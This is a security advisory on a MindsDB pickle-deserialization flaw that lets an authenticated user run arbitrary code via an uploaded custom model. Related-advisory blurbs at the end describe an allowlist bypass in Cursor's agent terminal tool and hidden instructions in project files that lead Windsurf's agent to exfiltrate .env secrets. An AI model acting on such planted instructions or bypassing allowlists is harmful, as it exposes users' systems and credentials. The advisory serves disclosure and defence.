SAI Security Advisory

Pickle Load on inhouse BYOM model prediction leads to arbitrary code execution

September 12, 2024

Products Impacted

This vulnerability is present in MindsDB versions v23.10.2.0 or newer.

CVSS Score: 7.1

AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-502: Deserialization of Untrusted Data

Details

To exploit this vulnerability, an attacker authenticated to a MindsDB instance can create a Python script to train a model on a dataset and make predictions. Within the script, an attacker can include a class to create a malicious pickle object within the method used to train the model. The attacker can use the ‘Upload Custom Model’ feature within the MindsDB UI to upload this Python script, along with the related requirements.txt file, which would need to contain any libraries required to successfully achieve the exploit. The attacker would then upload the relevant dataset as a file and use the appropriate SQL query to train the model with it and the uploaded script.

When the model is trained, it is serialized along with the malicious pickle object due to the use of pickle.dumps within the train method of the ModelWrapperUnsafe class in the mindsdb/integrations/handlers/byom_handler/byom_handler.py file. The aforementioned class is used when the BYOM engine is changed to ‘inhouse’. When a prediction query is subsequently run on the model, the code is passed to the vulnerable predict method of the ModelWrapperUnsafe class in the mindsdb/integrations/handlers/byom_handler/byom_handler.py file, which calls pickle.loads on the model, as shown below:

def predict(self, df, model_state, args):
    	model_state = pickle.loads(model_state)
    	self.model_instance.__dict__ = model_state
    	try:
        	result = self.model_instance.predict(df, args)
    	except Exception:
        	result = self.model_instance.predict(df)
    	return result

This leads to the malicious pickle object being deserialized and any arbitrary code contained within it being executed on the server.

Related SAI Security Advisory

CVE-2025-62354

November 26, 2025

Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode

Cursor

When in autorun mode with the secure ‘Follow Allowlist’ setting, Cursor checks commands sent to run in the terminal by the agent to see if a command has been specifically allowed. The function that checks the command has a bypass to its logic, allowing an attacker to craft a command that will execute non-whitelisted commands.

November 2025
SAI-ADV-2025-012

October 17, 2025

Data Exfiltration from Tool-Assisted Setup

Windsurf

Windsurf’s automated tools can execute instructions contained within project files without asking for user permission. This means an attacker can hide instructions within a project file to read and extract sensitive data from project files (such as a .env file) and insert it into web requests for the purposes of exfiltration.

October 2025